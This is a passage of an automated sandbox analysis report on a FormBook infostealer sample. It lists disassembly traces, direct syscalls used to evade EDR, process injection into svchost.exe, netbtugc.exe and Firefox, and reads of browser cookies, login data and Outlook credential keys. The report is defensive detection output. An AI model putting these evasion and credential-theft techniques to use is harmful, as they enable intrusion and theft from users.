            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604A80 mov eax, dword ptr fs:[00000030h]2_2_03604A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538AA0 mov eax, dword ptr fs:[00000030h]2_2_03538AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538AA0 mov eax, dword ptr fs:[00000030h]2_2_03538AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03586AA4 mov eax, dword ptr fs:[00000030h]2_2_03586AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B0946 mov eax, dword ptr fs:[00000030h]2_2_035B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604940 mov eax, dword ptr fs:[00000030h]2_2_03604940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D4978 mov eax, dword ptr fs:[00000030h]2_2_035D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D4978 mov eax, dword ptr fs:[00000030h]2_2_035D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BC97C mov eax, dword ptr fs:[00000030h]2_2_035BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03556962 mov eax, dword ptr fs:[00000030h]2_2_03556962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03556962 mov eax, dword ptr fs:[00000030h]2_2_03556962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03556962 mov eax, dword ptr fs:[00000030h]2_2_03556962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0357096E mov eax, dword ptr fs:[00000030h]2_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0357096E mov edx, dword ptr fs:[00000030h]2_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0357096E mov eax, dword ptr fs:[00000030h]2_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BC912 mov eax, dword ptr fs:[00000030h]2_2_035BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03528918 mov eax, dword ptr fs:[00000030h]2_2_03528918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03528918 mov eax, dword ptr fs:[00000030h]2_2_03528918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE908 mov eax, dword ptr fs:[00000030h]2_2_035AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE908 mov eax, dword ptr fs:[00000030h]2_2_035AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B892A mov eax, dword ptr fs:[00000030h]2_2_035B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C892B mov eax, dword ptr fs:[00000030h]2_2_035C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]2_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]2_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]2_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]2_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]2_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]2_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035649D0 mov eax, dword ptr fs:[00000030h]2_2_035649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FA9D3 mov eax, dword ptr fs:[00000030h]2_2_035FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C69C0 mov eax, dword ptr fs:[00000030h]2_2_035C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035629F9 mov eax, dword ptr fs:[00000030h]2_2_035629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035629F9 mov eax, dword ptr fs:[00000030h]2_2_035629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BE9E0 mov eax, dword ptr fs:[00000030h]2_2_035BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B89B3 mov esi, dword ptr fs:[00000030h]2_2_035B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B89B3 mov eax, dword ptr fs:[00000030h]2_2_035B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B89B3 mov eax, dword ptr fs:[00000030h]2_2_035B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035309AD mov eax, dword ptr fs:[00000030h]2_2_035309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035309AD mov eax, dword ptr fs:[00000030h]2_2_035309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03560854 mov eax, dword ptr fs:[00000030h]2_2_03560854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534859 mov eax, dword ptr fs:[00000030h]2_2_03534859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534859 mov eax, dword ptr fs:[00000030h]2_2_03534859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03542840 mov ecx, dword ptr fs:[00000030h]2_2_03542840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BE872 mov eax, dword ptr fs:[00000030h]2_2_035BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BE872 mov eax, dword ptr fs:[00000030h]2_2_035BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C6870 mov eax, dword ptr fs:[00000030h]2_2_035C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C6870 mov eax, dword ptr fs:[00000030h]2_2_035C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BC810 mov eax, dword ptr fs:[00000030h]2_2_035BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03552835 mov eax, dword ptr fs:[00000030h]2_2_03552835
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C70B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00C70B62
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C42622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C42622
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C3083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C3083F
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C309D5 SetUnhandledExceptionFilter,0_2_00C309D5
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C30C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00C30C21

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeNtQueryValueKey: Direct from: 0x76EF2BECJump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeNtClose: Direct from: 0x76EE7B2E
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeNtOpenKeyEx: Direct from: 0x76EF3C9CJump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeNtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread register set: target process: 6568Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread APC queued: target process: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 28E4008Jump to behavior
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C71201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00C71201
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C52BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00C52BA5
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C7B226 SendInput,keybd_event,0_2_00C7B226
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C922DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_00C922DA
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\BP-50C26_20241220_082241.exe"Jump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C70B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00C70B62
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C71663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00C71663
            Source: BP-50C26_20241220_082241.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: gaJjobDqjDYWsfRWPZSKY.exe, 00000003.00000002.4507202262.0000000001411000.00000002.00000001.00040000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000003.00000000.2111646852.0000000001411000.00000002.00000001.00040000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000000.2259883925.00000000013D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: BP-50C26_20241220_082241.exe, gaJjobDqjDYWsfRWPZSKY.exe, 00000003.00000002.4507202262.0000000001411000.00000002.00000001.00040000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000003.00000000.2111646852.0000000001411000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: gaJjobDqjDYWsfRWPZSKY.exe, 00000003.00000002.4507202262.0000000001411000.00000002.00000001.00040000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000003.00000000.2111646852.0000000001411000.00000002.00000001.00040000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000000.2259883925.00000000013D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: gaJjobDqjDYWsfRWPZSKY.exe, 00000003.00000002.4507202262.0000000001411000.00000002.00000001.00040000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000003.00000000.2111646852.0000000001411000.00000002.00000001.00040000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000000.2259883925.00000000013D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C30698 cpuid 0_2_00C30698
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C88195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00C88195
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C6D27A GetUserNameW,0_2_00C6D27A
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C4B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_00C4B952
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00C142DE

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4506129755.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4507614075.0000000002C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2187412228.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4509692516.0000000005230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4507710541.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2187102525.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2187890119.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4507743693.0000000002BB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: BP-50C26_20241220_082241.exeBinary or memory string: WIN_81
            Source: BP-50C26_20241220_082241.exeBinary or memory string: WIN_XP
